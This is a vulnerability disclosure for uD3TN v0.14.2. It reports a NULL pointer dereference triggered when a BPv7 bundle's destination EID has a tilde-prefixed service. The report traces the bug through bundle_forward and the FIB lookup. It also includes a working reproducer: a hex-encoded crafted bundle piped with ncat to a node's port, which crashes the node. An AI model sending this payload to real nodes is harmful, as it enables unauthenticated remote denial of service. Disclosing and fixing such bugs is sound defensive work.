NULL Pointer Dereference due to Tilde Character in EID

Summary

A BPv7 bundle whose destination EID is of the dtn scheme and has an SSP beginning with a tilde (e.g. dtn://node18/~tele) causes an immediate segmentation fault following a NULL pointer dereference in uD3TN v0.14.2. Tilde‑prefixed services denote non‑singleton endpoints according to RFC 9171 Section 4.4.5.1.1 and are a legitimate feature of BPv7's dtn scheme to allow multiple nodes to receive the same data.

Minimal Reproducer

The following lines replay a bundle with the following EID (dtn://node18/~tele) which causes the uD3TN node to crash.

# start node (example)
build/posix/ud3tn --node-id dtn://a.dtn/ --aap-port 4242 --aap2-socket ud3tn-a.aap2.socket --cla "mtcp:*,4224" -L 4

# crafted bundle triggering the crash
echo 9f88071a000200040082016e2f2f6e6f646531382f7e74656c6582016e2f2f6e6f646538312f66696c657382016e2f2f6e6f646538312f66696c6573821b0000009e8d0de538001b00000049f16b2400850a020000448218200085010100004443414243ff | python -c "import sys, cbor2; sys.stdout.buffer.write(cbor2.dumps(bytes.fromhex(sys.stdin.read())))" | ncat localhost 4224

Changing ~tele to tele in the EID makes the crash disappear, confirming that the tilde is behind the issue.

The same payload does NOT generate a segmentation fault when provided to the data-decoder in the uD3TN repo:

echo 9f88071a000200040082016e2f2f6e6f646531382f7e74656c6582016e2f2f6e6f646538312f66696c657382016e2f2f6e6f646538312f66696c6573821b0000009e8d0de538001b00000049f16b2400850a020000448218200085010100004443414243ff | xxd -r -p > segfault.bin

./build/posix/ud3tndecode -7 segfault.bin 
BPv7 bundle
  - source:       dtn://node81/files
  - destination:  dtn://node18/~tele
  - report to:    dtn://node81/files
  - creation ts.: 680971330872
  - sequence no.: 0
  - expires at:   998554274
  - payload len.: 4
  - proc. flags:  0x20004
  - block no. 2 of type = 10 (hop count block)
  - flags:  0x0000
  - length: 4
  - block no. 1 of type = 1 (payload block)
  - flags:  0x0000
  - length: 4

The above crashing bundle is accepted by the bp7-rs implementation

Bug in detail

Using GDB to take a closer look at the issue we find the following crash chain.

  1. It starts with bundle_forward() -> char *dst_node_id = get_node_id(bundle->destination);
  2. Here get_node_id() detects the tilde and returns NULL (non‑singleton endpoint) as seen in the source code snippet below (components/ud3tn/eid.c:275)
		// Demux starts with tilde (-> non-singleton EID -> no node ID)
		if (delim[1] == '~')
			return NULL;
  1. bundle_forward() passes this NULL to fib_lookup_node() without validation
  2. fib_lookup_node() -> HASH(key) -> strlen(NULL)
  3. __strlen_evex in libc dereferences NULL leading to the segmentation fault

It seems that uD3TN correctly identifies the case for dtn EID where a non-singleton endpoint is defined and get_node_id() intentionally returns NULL. However, bundle_forward() and downstream FIB functions assume the pointer is never NULL and call strlen() on it.

Impact

  • Remote DoS: any unauthenticated peer can crash a uD3TN node by sending a bundle with the EID set to the dtn scheme and tilde‑prefixed SSP.